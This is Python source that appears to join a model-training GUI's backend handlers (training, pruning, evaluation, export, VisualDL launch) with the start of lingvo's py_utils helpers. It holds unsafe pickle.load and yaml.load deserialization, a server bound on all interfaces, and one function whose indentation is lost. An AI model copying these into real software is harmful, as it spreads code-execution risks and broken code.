        data: dict with key 'pid' and optional 'gpu_list' (GPU indices).
        workspace: workspace registry.
        machine_info: dict with 'gpu_num' and per-GPU 'gpu_free_mem'.
    Returns:
        {'status': 1, 'train': <params>}
    Raises:
        Exception: if dataset details cannot be fetched.
    """
    from .train.params_v2 import get_params
    from ..dataset.dataset import get_dataset_details
    pid = data['pid']
    assert pid in workspace.projects, "项目ID{}不存在.".format(pid)
    project_type = workspace.projects[pid].type
    did = workspace.projects[pid].did
    result = get_dataset_details({'did': did}, workspace)
    if result['status'] == 1:
        details = result['details']
    else:
        raise Exception("Fail to get dataset details!")
    train_num = len(details['train_files'])
    class_num = len(details['labels'])
    if machine_info['gpu_num'] == 0:
        # CPU-only machine.
        gpu_num = 0
        per_gpu_memory = 0
        gpu_list = None
    else:
        if 'gpu_list' in data:
            # Use the requested GPUs; size params by the smallest free memory
            # among them.
            gpu_list = data['gpu_list']
            gpu_num = len(gpu_list)
            per_gpu_memory = None
            for gpu_id in gpu_list:
                if per_gpu_memory is None:
                    per_gpu_memory = machine_info['gpu_free_mem'][gpu_id]
                elif machine_info['gpu_free_mem'][gpu_id] < per_gpu_memory:
                    per_gpu_memory = machine_info['gpu_free_mem'][gpu_id]
        else:
            # Default to the first GPU.
            gpu_num = 1
            per_gpu_memory = machine_info['gpu_free_mem'][0]
            gpu_list = [0]
    params = get_params(data, project_type, train_num, class_num, gpu_num,
                        per_gpu_memory, gpu_list)
    return {"status": 1, "train": params}
def get_task_params(data, workspace):
    """Return the training parameters stored for a task.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1, 'train': <params object unpickled from params.pkl>}
    """
    tid = data['tid']
    assert tid in workspace.tasks, "【任务创建】任务ID'{}'不存在.".format(tid)
    params_file = osp.join(workspace.tasks[tid].path, 'params.pkl')
    with open(params_file, 'rb') as f:
        stored = pickle.load(f)
    return {'status': 1, 'train': stored['train']}
def get_task_status(data, workspace):
    """Get the status of a task.

    Args:
        data: dict with key 'tid'; optional key 'resume' additionally
            requests whether training can be resumed.
    Returns:
        dict with 'status', 'task_status', 'message', 'type' and, when
        'resume' was requested, 'resumable' and 'max_saved_epochs'.
    """
    from .operate import get_task_status, get_task_max_saved_epochs
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    path = workspace.tasks[tid].path
    status, message = get_task_status(path)
    task_pid = workspace.tasks[tid].pid
    task_type = workspace.projects[task_pid].type
    if 'resume' in data:
        # Training is resumable iff at least one epoch checkpoint was saved
        # and the configured number of epochs has not been reached yet.
        max_saved_epochs = get_task_max_saved_epochs(path)
        params = {'tid': tid}
        results = get_task_params(params, workspace)
        total_epochs = results['train'].num_epochs
        resumable = max_saved_epochs > 0 and max_saved_epochs < total_epochs
        return {
            'status': 1,
            'task_status': status.value,
            'message': message,
            'resumable': resumable,
            'max_saved_epochs': max_saved_epochs,
            'type': task_type
        }
    return {
        'status': 1,
        'task_status': status.value,
        'message': message,
        'type': task_type
    }
def get_train_metrics(data, workspace):
    """Read a task's training log.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1, 'train_log': dict} where the dict carries 'eta',
        'train_metrics', 'eval_metircs', 'download_status', 'eval_done' and
        'train_error' fields parsed from out.log.
    """
    from ..utils import TrainLogReader
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    log_file = osp.join(workspace.tasks[tid].path, 'out.log')
    reader = TrainLogReader(log_file)
    reader.update()
    return {'status': 1, 'train_log': reader.__dict__}
def get_eval_metrics(data, workspace):
    """Return the eval metrics recorded in the best model's model.yml.

    Args:
        data: dict with key 'tid' (the parent task id).
    Returns:
        {'status': 1, 'eval_metric': <metrics dict>}
    """
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    best_model_path = osp.join(workspace.tasks[tid].path, "output",
                               "best_model", "model.yml")
    import yaml
    # Bug fix: use a context manager so the file is closed even when parsing
    # raises (previously f.close() was skipped on error).
    with open(best_model_path, "r", encoding="utf-8") as f:
        # NOTE(review): yaml.load without an explicit Loader is deprecated and
        # unsafe on untrusted input; model.yml is produced locally, but
        # consider yaml.safe_load if its contents permit it.
        eval_metrics = yaml.load(f)['_Attributes']['eval_metrics']
    return {'status': 1, 'eval_metric': eval_metrics}
def get_eval_all_metrics(data, workspace):
    """Collect per-epoch eval metrics from a task's output directory.

    Scans output/epoch_<n> directories marked with a ".success" file, reads
    the first metric from each model.yml and tracks the best epoch (ties go
    to the earliest epoch).

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1, 'key': <metric name or None>, 'epoch_result_dict': ...,
         'best_epoch': ..., 'best_result': ...}
    """
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    output_dir = osp.join(workspace.tasks[tid].path, "output")
    epoch_result_dict = dict()
    best_epoch = -1
    best_result = -1
    # Bug fix: `key` was unbound (NameError at the return statement) when no
    # finished epoch directory exists.
    key = None
    import yaml
    for file_dir in os.listdir(output_dir):
        if file_dir.startswith("epoch"):
            epoch_dir = osp.join(output_dir, file_dir)
            if osp.exists(osp.join(epoch_dir, ".success")):
                epoch_index = int(file_dir.split('_')[-1])
                yml_file_path = osp.join(epoch_dir, "model.yml")
                # Bug fix: file handles were opened but never closed.
                with open(yml_file_path, 'r', encoding='utf-8') as f:
                    yml_file = yaml.load(f.read())
                result = yml_file["_Attributes"]["eval_metrics"]
                key = list(result.keys())[0]
                value = result[key]
                if value > best_result:
                    best_result = value
                    best_epoch = epoch_index
                elif value == best_result:
                    if epoch_index < best_epoch:
                        best_epoch = epoch_index
                epoch_result_dict[epoch_index] = value
    return {
        'status': 1,
        'key': key,
        'epoch_result_dict': epoch_result_dict,
        'best_epoch': best_epoch,
        'best_result': best_result
    }
def get_sensitivities_loss_img(data, workspace):
    """Return the sensitivity-vs-prune-ratio curve data for a task.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1, 'sensitivities_loss_img': <unpickled x/y data>}
    """
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    task_path = workspace.tasks[tid].path
    pkl_path = osp.join(task_path, 'prune', 'sensitivities_xy.pkl')
    import pickle
    # Bug fix: the file handle was opened inline and never closed.
    with open(pkl_path, 'rb') as f:
        sensitivities_xy = pickle.load(f)
    return {'status': 1, 'sensitivities_loss_img': sensitivities_xy}
def start_train_task(data, workspace, monitored_processes):
    """Start a training task in a child process.

    Args:
        data: dict with key 'tid'; optional 'eval_metric_loss' (eval-loss
            budget required by pruning-training tasks).
        workspace: workspace registry.
        monitored_processes: queue collecting pids of spawned processes.
    Returns:
        {'status': 1}
    """
    from .operate import train_model
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    path = workspace.tasks[tid].path
    if 'eval_metric_loss' in data and \
            data['eval_metric_loss'] is not None:
        # Pruning task: rewrite params.pkl so training uses the parent task's
        # sensitivity file and best model as pretrained weights.
        parent_id = workspace.tasks[tid].parent_id
        assert parent_id != "", "任务{}不是裁剪训练任务".format(tid)
        parent_path = workspace.tasks[parent_id].path
        sensitivities_path = osp.join(parent_path, 'prune',
                                      'sensitivities.data')
        eval_metric_loss = data['eval_metric_loss']
        parent_best_model_path = osp.join(parent_path, 'output', 'best_model')
        params_conf_file = osp.join(path, 'params.pkl')
        with open(params_conf_file, 'rb') as f:
            params = pickle.load(f)
        params['train'].sensitivities_path = sensitivities_path
        params['train'].eval_metric_loss = eval_metric_loss
        params['train'].pretrain_weights = parent_best_model_path
        with open(params_conf_file, 'wb') as f:
            pickle.dump(params, f)
    p = train_model(path)
    monitored_processes.put(p.pid)
    return {'status': 1}
def resume_train_task(data, workspace, monitored_processes):
    """Resume a training task from a saved epoch checkpoint.

    Args:
        data: dict with keys 'tid' (task id) and 'epoch' (epoch to resume
            from).
        workspace: workspace registry.
        monitored_processes: queue collecting pids of spawned processes.
    Returns:
        {'status': 1}
    """
    from .operate import train_model
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    task_dir = workspace.tasks[tid].path
    checkpoint = osp.join(task_dir, "output", "epoch_" + str(data['epoch']))
    conf_file = osp.join(task_dir, 'params.pkl')
    with open(conf_file, 'rb') as fp:
        stored = pickle.load(fp)
    stored['train'].resume_checkpoint = checkpoint
    with open(conf_file, 'wb') as fp:
        pickle.dump(stored, fp)
    proc = train_model(task_dir)
    monitored_processes.put(proc.pid)
    return {'status': 1}
def stop_train_task(data, workspace):
    """Stop a running training task.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1}
    """
    from .operate import stop_train_model
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    stop_train_model(workspace.tasks[tid].path)
    return {'status': 1}
def start_prune_analysis(data, workspace, monitored_processes):
    """Launch the prune (sensitivity) analysis for a task in a child process.

    Args:
        data: dict with key 'tid' (task id).
        workspace: workspace registry.
        monitored_processes: queue collecting pids of spawned processes.
    Returns:
        {'status': 1}
    """
    from .operate import prune_analysis_model
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    proc = prune_analysis_model(workspace.tasks[tid].path)
    monitored_processes.put(proc.pid)
    return {'status': 1}
def get_prune_metrics(data, workspace):
    """Read a task's prune-analysis log.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1, 'prune_log': dict or None}; the dict carries 'eta',
        'iters', 'current' and 'progress' parsed from the log, or None when
        the log file does not exist yet.
    """
    from ..utils import PruneLogReader
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    log_file = osp.join(workspace.tasks[tid].path, 'prune', 'out.log')
    if not osp.exists(log_file):
        # The analysis has not produced a log yet.
        return {'status': 1, 'prune_log': None}
    reader = PruneLogReader(log_file)
    reader.update()
    return {'status': 1, 'prune_log': reader.__dict__}
def get_prune_status(data, workspace):
    """Query the status of a task's prune analysis.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1, 'prune_status': <enum value or None>, 'message': ...}
    """
    from .operate import get_prune_status
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    prune_dir = osp.join(workspace.tasks[tid].path, "prune")
    status, message = get_prune_status(prune_dir)
    prune_status = status.value if status is not None else None
    return {'status': 1, 'prune_status': prune_status, 'message': message}
def stop_prune_analysis(data, workspace):
    """Stop a running prune analysis.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1}
    """
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    from .operate import stop_prune_analysis
    stop_prune_analysis(osp.join(workspace.tasks[tid].path, 'prune'))
    return {'status': 1}
def evaluate_model(data, workspace, monitored_processes):
    """Kick off model evaluation in a child process.

    Args:
        data: dict with keys 'tid', 'epoch', 'topk', 'score_thresh' and
            'overlap_thresh' (evaluation settings).
        workspace: workspace registry.
        monitored_processes: queue collecting pids of spawned processes.
    Returns:
        {'status': 1}
    """
    from .operate import evaluate_model
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    pid = workspace.tasks[tid].pid
    assert pid in workspace.projects, "项目ID'{}'不存在".format(pid)
    path = workspace.tasks[tid].path
    # Renamed from `type` to avoid shadowing the builtin.
    project_type = workspace.projects[pid].type
    p = evaluate_model(path, project_type, data['epoch'], data['topk'],
                       data['score_thresh'], data['overlap_thresh'])
    monitored_processes.put(p.pid)
    return {'status': 1}
def get_evaluate_result(data, workspace):
    """Fetch the result of a model evaluation.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        dict with 'status' (1 ok/ongoing, -1 failure), 'evaluate_status', a
        human-readable 'message' and 'result' (the unpickled metrics, or None
        unless evaluation finished and its result file exists; on success
        'path' is added as well).
    """
    from .operate import get_evaluate_status
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    task_path = workspace.tasks[tid].path
    status, message = get_evaluate_status(task_path)
    if status == TaskStatus.XEVALUATED:
        result_file = osp.join(task_path, 'eval_res.pkl')
        if os.path.exists(result_file):
            # Bug fix: the file handle was opened inline via
            # pickle.load(open(...)) and never closed.
            with open(result_file, "rb") as f:
                result = pickle.load(f)
            return {
                'status': 1,
                'evaluate_status': status,
                'message': "{}评估完成".format(tid),
                'path': result_file,
                'result': result
            }
        else:
            return {
                'status': -1,
                'evaluate_status': status,
                'message': "评估结果丢失,建议重新评估!",
                'result': None
            }
    if status == TaskStatus.XEVALUATEFAIL:
        return {
            'status': -1,
            'evaluate_status': status,
            'message': "评估失败,请重新评估!",
            'result': None
        }
    return {
        'status': 1,
        'evaluate_status': status,
        'message': "{}正在评估中,请稍后!".format(tid),
        'result': None
    }
def get_predict_status(data, workspace):
    """Query the prediction progress of a task.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        dict with 'status', 'predict_status', 'message', 'predict_num' and
        'total_num'.
    """
    from .operate import get_predict_status
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    status, message, predict_num, total_num = get_predict_status(
        workspace.tasks[tid].path)
    return {
        'status': 1,
        'predict_status': status.value,
        'message': message,
        'predict_num': predict_num,
        'total_num': total_num
    }
def predict_test_pics(data, workspace, monitored_processes):
    """Run prediction on test images in a child process.

    Args:
        data: dict with key 'tid'; optional 'img_list', 'image_data',
            'save_dir', 'epoch' and 'score_thresh' (default 0.5).
        workspace: workspace registry.
        monitored_processes: queue collecting pids of spawned processes.
    Returns:
        {'status': 1, 'path': <result image path when 'image_data' given,
        else None>}
    """
    from .operate import predict_test_pics
    tid = data['tid']
    img_list = data.get('img_list', list())
    image_data = data.get('image_data')
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    task_dir = workspace.tasks[tid].path
    p, save_dir = predict_test_pics(
        task_dir,
        save_dir=data.get('save_dir'),
        img_list=img_list,
        img_data=image_data,
        score_thresh=data.get('score_thresh', 0.5),
        epoch=data.get('epoch'))
    monitored_processes.put(p.pid)
    if 'image_data' in data:
        result_path = osp.join(save_dir, 'predict_result.png')
    else:
        result_path = None
    return {'status': 1, 'path': result_path}
def stop_predict_task(data, workspace):
    """Stop a running prediction task and report its final progress.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        dict with 'status', 'predict_status', 'message', 'predict_num' and
        'total_num'.
    """
    from .operate import stop_predict_task
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    status, message, predict_num, total_num = stop_predict_task(
        workspace.tasks[tid].path)
    return {
        'status': 1,
        'predict_status': status.value,
        'message': message,
        'predict_num': predict_num,
        'total_num': total_num
    }
def get_quant_progress(data, workspace):
    """Read the quantization/export log of a task.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1, 'quant_log': <parsed log fields as a dict>}
    """
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    from ..utils import QuantLogReader
    log_file = osp.join(workspace.tasks[tid].path, "./logs/export", 'out.log')
    reader = QuantLogReader(log_file)
    reader.update()
    return {'status': 1, 'quant_log': reader.__dict__}
def get_quant_result(data, workspace):
    """Load quantization results (quant_result.json) for a task.

    Returns an empty dict as the result when the file does not exist yet.
    """
    import json
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    result_json = osp.join(workspace.tasks[tid].path, "./logs/export",
                           'quant_result.json')
    result = {}
    if osp.exists(result_json):
        with open(result_json, 'r') as f:
            result = json.load(f)
    return {'status': 1, 'quant_result': result}
def get_export_status(data, workspace):
    """Get the model-export status of a task.

    Args:
        data: dict with key 'tid' (task id).
        workspace: workspace object holding the task registry.

    Returns:
        dict with overall status, the export status and a user-facing message.
    """
    from .operate import get_export_status
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    task_path = workspace.tasks[tid].path
    # NOTE(review): `message` is computed but never returned; sibling handlers
    # (stop_export_task, get_predict_status) return status.value while this one
    # returns the raw enum — confirm clients expect the enum here.
    status, message = get_export_status(task_path)
    if status == TaskStatus.XEXPORTED:
        return {
            'status': 1,
            'export_status': status,
            'message': "恭喜您,{}任务模型导出成功!".format(tid)
        }
    if status == TaskStatus.XEXPORTFAIL:
        return {
            'status': -1,
            'export_status': status,
            'message': "{}任务模型导出失败,请重试!".format(tid)
        }
    return {
        'status': 1,
        'export_status': status,
        'message': "{}任务模型导出中,请稍等!".format(tid)
    }
def export_infer_model(data, workspace, monitored_processes):
    """Export a deployable inference model for a task.

    Args:
        data: dict with keys 'tid' (task id), 'save_dir' (output dir) and
            optional 'epoch', 'quant' (quantized export if truthy).
        workspace: workspace object holding the task registry.
        monitored_processes: queue collecting pids of spawned processes.

    Returns:
        dict with status and the output directory.
    """
    from .operate import export_noquant_model, export_quant_model
    tid = data['tid']
    save_dir = data['save_dir']
    epoch = data.get('epoch', None)
    quant = data.get('quant', False)
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    task_path = workspace.tasks[tid].path
    export_fn = export_quant_model if quant else export_noquant_model
    p = export_fn(task_path, save_dir, epoch)
    monitored_processes.put(p.pid)
    return {'status': 1, 'save_dir': save_dir}
def export_lite_model(data, workspace):
    """Convert an exported model to a Paddle-Lite model.

    Args:
        data: dict with keys 'tid' (task id), 'model_path' (source model)
            and 'save_dir' (output directory).
        workspace: workspace object holding the task registry.

    Returns:
        dict with status 1 on success, -1 (and save_dir removed) on failure.
    """
    from .operate import opt_lite_model
    model_path = data['model_path']
    save_dir = data['save_dir']
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    opt_lite_model(model_path, save_dir)
    # Success is signalled by the presence of the compiled model.nb file.
    if osp.exists(osp.join(save_dir, "model.nb")):
        return {'status': 1, 'message': "完成"}
    if osp.exists(save_dir):
        shutil.rmtree(save_dir)
    return {'status': -1, 'message': "导出为lite模型失败"}
def stop_export_task(data, workspace):
    """Stop a running export task.

    Args:
        data: dict with key 'tid' (task id).
        workspace: workspace object holding the task registry.

    Returns:
        dict with the current export status and message.
    """
    from .operate import stop_export_task
    task_id = data['tid']
    assert task_id in workspace.tasks, "任务ID'{}'不存在".format(task_id)
    status, message = stop_export_task(workspace.tasks[task_id].path)
    return {'status': 1, 'export_status': status.value, 'message': message}
def _open_vdl(logdir, current_port):
    """Serve VisualDL for `logdir` on the given port (blocking call).

    Runs in a child process; binds on all interfaces (0.0.0.0).
    """
    from visualdl.server import app
    app.run(logdir=logdir, host='0.0.0.0', port=current_port)
def open_vdl(data, workspace, current_port, monitored_processes,
             running_boards):
    """Open a VisualDL board for a task, reusing a live server if present.

    Args:
        data: dict with key 'tid' (task id).
        workspace: workspace object holding the task registry.
        current_port: first candidate port to try for the server.
        monitored_processes: queue collecting pids of spawned processes.
        running_boards: dict mapping tid -> [port, pid] of live servers.

    Returns:
        dict with status and the board URL ("<ip>:<port>").
    """
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
    ip = get_ip()
    # Reuse an already-running board for this task.
    if tid in running_boards:
        url = ip + ":{}".format(running_boards[tid][0])
        return {'status': 1, 'url': url}
    task_path = workspace.tasks[tid].path
    logdir = osp.join(task_path, 'output', 'vdl_log')
    assert osp.exists(logdir), "该任务还未正常产生日志文件"
    # Scan upward for a free port; give up past 8500.
    port_available = is_available(ip, current_port)
    while not port_available:
        current_port += 1
        port_available = is_available(ip, current_port)
        assert current_port <= 8500, "找不到可用的端口"
    p = mp.Process(target=_open_vdl, args=(logdir, current_port))
    p.start()
    monitored_processes.put(p.pid)
    url = ip + ":{}".format(current_port)
    running_boards[tid] = [current_port, p.pid]
    current_port += 1
    total_time = 0
    # Wait (max ~8s) until the server binds its port, i.e. the port stops
    # being "available".
    while True:
        if not is_available(ip, current_port - 1):
            break
        # NOTE(review): looks like a leftover debug print.
        print(current_port)
        time.sleep(0.5)
        total_time += 0.5
        assert total_time <= 8, "VisualDL服务启动超时,请重新尝试打开"
    return {'status': 1, 'url': url}
|
py_utils.py | # Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
# ==============================================================================
# Note: Avoid adding dependencies to py_utils beyond standard python packages
# and tensorflow.
# ==============================================================================
import collections as py_collections
import contextlib
import functools
import hashlib
import inspect
import math
import numbers
import os
import pkgutil
import re
import threading
import traceback
import typing
from typing import Optional, Union
import lingvo.compat as tf
from lingvo.core import cluster_factory
from lingvo.core import gshard_utils
from lingvo.core import hyperparams
from lingvo.core import nested_map
from lingvo.core import ops
from lingvo.core import py_utils_flags
from lingvo.core import retry
from lingvo.core import symbolic
from lingvo.core import thread_local_utils
from lingvo.core import tshape
import numpy as np
import six
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import function
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import stateless_random_ops
from tensorflow.python.tf2 import enabled as tf2_enabled
from tensorflow.python.tpu import topology as tf_topology
from tensorflow.python.tpu import tpu_function
from tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
FLAGS = tf.flags.FLAGS
# pylint: disable=protected-access
_FromGlobal = py_utils_flags._FromGlobal
# pylint: enable=protected-access
use_xla = py_utils_flags.use_xla
use_tpu = py_utils_flags.use_tpu
testonly_skip_norm_layers = py_utils_flags.testonly_skip_norm_layers
tpu_compat = py_utils_flags.tpu_compat
use_stateless_vars_init = py_utils_flags.use_stateless_vars_init
ENQUEUE_OPS = '__lingvo_enqueue_ops'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
ThreadLocalStack = thread_local_utils.ThreadLocalStack
ThreadLocalDict = thread_local_utils.ThreadLocalDict
NestedMap = nested_map.NestedMap
def Assert(condition, data, *args, **kwargs):
  """tf.Assert when asserts are enabled; otherwise a no-op."""
  if not py_utils_flags.enable_asserts():
    return tf.no_op()
  return tf.Assert(condition, data, *args, **kwargs)
def assert_equal(*args, **kwargs):  # pylint: disable=invalid-name
  """tf.assert_equal when asserts are enabled; otherwise a no-op."""
  if not py_utils_flags.enable_asserts():
    return tf.no_op()
  return tf.assert_equal(*args, **kwargs)
def assert_greater_equal(*args, **kwargs):  # pylint: disable=invalid-name
  """tf.debugging.assert_greater_equal when asserts are enabled; else no-op."""
  if not py_utils_flags.enable_asserts():
    return tf.no_op()
  return tf.debugging.assert_greater_equal(*args, **kwargs)
def assert_greater(*args, **kwargs):  # pylint: disable=invalid-name
  """tf.assert_greater when asserts are enabled; otherwise a no-op."""
  if not py_utils_flags.enable_asserts():
    return tf.no_op()
  return tf.assert_greater(*args, **kwargs)
def assert_less_equal(*args, **kwargs):  # pylint: disable=invalid-name
  """tf.debugging.assert_less_equal when asserts are enabled; else a no-op."""
  if not py_utils_flags.enable_asserts():
    return tf.no_op()
  return tf.debugging.assert_less_equal(*args, **kwargs)
def assert_less(*args, **kwargs):  # pylint: disable=invalid-name
  """tf.assert_less when asserts are enabled; otherwise a no-op."""
  if not py_utils_flags.enable_asserts():
    return tf.no_op()
  return tf.assert_less(*args, **kwargs)
def assert_between(x, l, r, *args, **kwargs):  # pylint: disable=invalid-name
  """Asserts l <= x < r elementwise (bounds are cast to x's dtype)."""
  x = tf.convert_to_tensor(x)
  lower = tf.cast(tf.convert_to_tensor(l), x.dtype)
  upper = tf.cast(tf.convert_to_tensor(r), x.dtype)
  checks = [
      assert_greater_equal(x, lower, *args, **kwargs),
      assert_less(x, upper, *args, **kwargs),
  ]
  return tf.group(checks)
def assert_shape_match(*args, **kwargs):  # pylint: disable=invalid-name
  """ops.assert_shape_match when asserts are enabled; otherwise a no-op.

  Tags the assert message with the caller's file:line(function) so failures
  can be traced back to the call site.
  """
  if py_utils_flags.enable_asserts():
    filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
    # Strip the directory prefix to keep the message short.
    kwargs['msg'] = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(
        r'.*/', '', filepath), line, func)
    return ops.assert_shape_match(*args, **kwargs)
  else:
    return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs):  # pylint: disable=invalid-name
  """ops.assert_same_dim0 when asserts are enabled; otherwise a no-op."""
  if not py_utils_flags.enable_asserts():
    return tf.no_op()
  return ops.assert_same_dim0(xs, *args, **kwargs)
def assert_even_divide(denorm, num):  # pylint: disable=invalid-name
  """Asserts that `denorm` is evenly divided by `num`.

  Args:
    denorm: an integer Tensor (tf.int32/tf.int64), the dividend.
    num: an integer Tensor of the same shape, the divisor.

  Returns:
    An assert op checking that denorm % num == 0.

  Raises:
    ValueError: if either input is not tf.int32 or tf.int64.
  """
  denorm = tf.convert_to_tensor(denorm)
  num = tf.convert_to_tensor(num)
  if denorm.dtype not in (tf.int32, tf.int64):
    # Fixed typo in the error message: 'denorminator' -> 'denominator'.
    raise ValueError('denominator.dtype is not tf.int32 or tf.int64.')
  if num.dtype not in (tf.int32, tf.int64):
    raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
  num = HasShape(num, GetShape(denorm))
  quo = denorm // num
  # Integer division followed by multiplication recovers denorm only when
  # the division was exact.
  return assert_equal(quo * num, denorm)
def AssertIdShape(expected_ids_shape_pattern, ids_shape, *args):
  """Asserts shape expected_ids_shape_pattern matches all other input shapes."""

  def AssertFn(inputs):
    # Check ids_shape against the pattern, then against every extra shape.
    dependencies = [
        assert_shape_match(inputs.ids_shape, inputs.expected_ids_shape_pattern)
    ] + [
        assert_shape_match(inputs.ids_shape, x_shape) for x_shape in inputs.args
    ]
    return with_dependencies(dependencies, inputs.ids_shape)

  inputs = NestedMap(
      expected_ids_shape_pattern=expected_ids_shape_pattern,
      ids_shape=ids_shape,
      args=args)
  # Convert everything to tensors and run the checks inside a defun-style call.
  return CallDefun(AssertFn, Transform(tf.convert_to_tensor, inputs))
def _CheckNumerics(x, message=None, *args, **kwargs):
  """Attaches a CheckNumerics op to a float tensor; identity otherwise."""
  if not x.dtype.is_floating:
    return x
  x_name = '[eager]' if tf.executing_eagerly() else x.name
  # Default op name: tensor name with the ':<index>' suffix stripped.
  kwargs.setdefault('name', re.sub(r':\d+', '', x_name) + '_CheckNumerics')
  return tf.debugging.check_numerics(x, message if message else x_name, *args,
                                     **kwargs)
def CheckNumerics(inp, message=None, *args, **kwargs):
  """Checks numerics for each tensor in `inp` (tensor, list or tuple)."""
  if not py_utils_flags.enable_check_numerics():
    return inp
  check = lambda x: _CheckNumerics(x, message, *args, **kwargs)
  if isinstance(inp, list):
    return list(map(check, inp))
  if isinstance(inp, tuple):
    return tuple(map(check, inp))
  return check(inp)
def with_dependencies(dependencies, output_tensor):  # pylint: disable=invalid-name
  """Returns output_tensor with the given ops as control dependencies."""
  with tf.control_dependencies(dependencies):
    return tf.identity(output_tensor)
def _VarInCollection(var, collection):
  """Return whether a variable `var` is in the given variable collection."""
  # Compare by reference: variables are not hashable in eager mode.
  target = var.ref()
  return any(v.ref() == target for v in collection)
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
try:
yield
finally:
np.set_printoptions(**original)
def _Print(name, x):
  """Logs 'name = repr(x)' with a wide numpy print width (py_func target)."""
  with _PrintOptions(linewidth=1000):
    tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
  """Prints out values of tensors.

  Useful for debugging. E.g.,

    x = ... a tf.Tensor ...
    y = ... a tf.Tensor ...
    z = compute(x, y)
    z = Log(z, 'debug compute()', x=x, y=y)

  Args:
    value: A Tensor. Log happens after this tensor's computed.
    prefix: Every tensor is logged with this prefix.
    **kwargs: keywords and tensors. Tensors are logged in the sort order of
      these keywards.

  Returns:
    value is returned.
  """
  # Chain control dependencies so tensors are printed in sorted-key order.
  prev = value
  for key in sorted(kwargs):
    with tf.control_dependencies([prev]):
      prev = tf.py_func(_Print, [prefix + ' : ' + key, kwargs[key]], [])
  with tf.control_dependencies([prev]):
    return tf.identity(value)
def Debug(tensor, message='', enabled=True, summarize=100, more=None):
  """Wrapper around tf.Print() and tf.logging.info() to simplify debug printing.

      x = py_utils.Debug(x)

  When the graph is built a regular log info line will be printed:

      -DBG- py_utils_test.py:429 x=Tensor(...

  Then when the tensor node is evaluated it will print lines like:

      -DBG- py_utils_test.py:429 x Const:0[x.shape=][2 2][x=][[1 2][3 4]]

  WARNING: The code that parses local variable names can fail. E.g. don't write
  two Debug() calls on one line or a Debug() call that spans more than one line.

  Args:
    tensor: A tensor to print.
    message: A message to print.
    enabled: To enable the debugging.
    summarize: Integer with number of tensor values to print.
    more: An optional list of additional tensors.

  Returns:
    The tensor.
  """
  if not enabled or _FromGlobal('disable_py_utils_debug'):
    return tensor
  if more is None:
    more = []
  # Inspect the caller's frame to recover the argument's variable name from
  # the source line of the Debug() call.
  stack = inspect.stack()[1][0]
  caller = inspect.getframeinfo(stack)
  caller_var = ''
  caller_more_vars = []
  if caller.code_context:
    # Rough and likely to fail. But better than nothing.
    match = re.compile(r'Debug\((.*?)(\)|,).*$').search(caller.code_context[0])
    if match:
      caller_var = match.groups()[0]
    if more:
